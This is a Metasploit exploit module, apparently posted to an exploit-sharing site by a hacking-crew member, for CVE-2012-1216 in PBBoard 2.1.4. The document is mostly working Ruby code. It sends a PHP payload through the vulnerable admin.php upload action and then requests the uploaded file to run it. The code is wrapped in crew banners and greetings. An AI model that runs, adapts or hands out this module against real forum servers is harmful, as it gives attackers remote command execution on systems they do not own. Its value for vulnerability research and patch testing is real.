### # Title : PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution (MSF) # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com | www.inj3ct0rs.com # mY nEw FaCeb0ok : http://fb.me/Inj3ct0rK3d # Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com # platform : php # Type : Metasploit -Remote Exploit- # Security Risk : Critical # Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 ### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha | # | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** | # | ------------------------------------------------- < | ## # <3 <3 Greetings t0 Palestine <3 <3 # Download : [http://github.com/downloads/PhpMax/PBBoard/PBBoard_v2_1_4.zip] ######## (!) References => # _______________ # | CVE-2012-1216 | # | OSVDB-79218 | # | 1337ID-17520 | # | PS-SEC-109706 | # | CWE-352 | # --------------- # ######## (!) Exploit ====> require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "PBBoard v2.1.4 (CSRF) Arbitrary File Upload and Command Execution", 'Description' => %q{ This module exploits a Multiple cross-site request forgery (CSRF) vulnerabilities in admin.php in PBBoard 2.1.4 allow remote attackers to hijack the authentication of administrators for requests that upload a file via an add action. }, 'License' => MSF_LICENSE, 'Author' => [ 'KedAns-Dz <ked-h[at]1337day.com>', # Discovery PoC ,and Metasploit module ], 'References' => [ ['CVE', '2012-1216'], ['OSVDB', '79218'], ['URL', 'http://1337day.com/exploits/17520'], # 1337ID-17520 ['URL', 'http://secunia.com/advisories/47948/'], # SA47948 ['URL', 'http://packetstormsecurity.org/files/109706/PBBoard-2.1.4-Cross-Site-Request-Forgery-Shell-Upload.html'] # PS-SEC-109706 # CWE-352 # http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1216 ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['PBBoard v2.1.4', {}] ], 'Privileged' => false, 'DisclosureDate' => "Fev 12 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to dorncms', '/PBBoard v2.1.4']) ], self.class) end def check uri = target_uri.path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}admin.php" }) if res and res.code == 200 and res.body.empty? return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" payload_name = Rex::Text.rand_text_alpha(rand(5) + 5) + '.php' post_data = "--1337day\r\n" post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n" post_data << "Content-Type : text/html;\r\n" post_data << "<?php " post_data << payload.encoded post_data << " ?>\r\n" post_data << "--1337day\r\n" print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}admin.php?page=pages&add=1&start=1", 'ctype' => 'multipart/form-data; boundary=1337day', 'data' => post_data }) if not res or res.code != 200 or res.body !~ /#{payload_name}/ print_error("#{peer} - I don't think the file was uploaded !") return end print_status("#{peer} - Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}#{payload_name}" }) if res and res.code != 200 print_status("#{peer} - Server returns #{res.code.to_s}") end end ############# << ThE|End #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke # JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Dis9-UE # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs .. #===========================================================================================================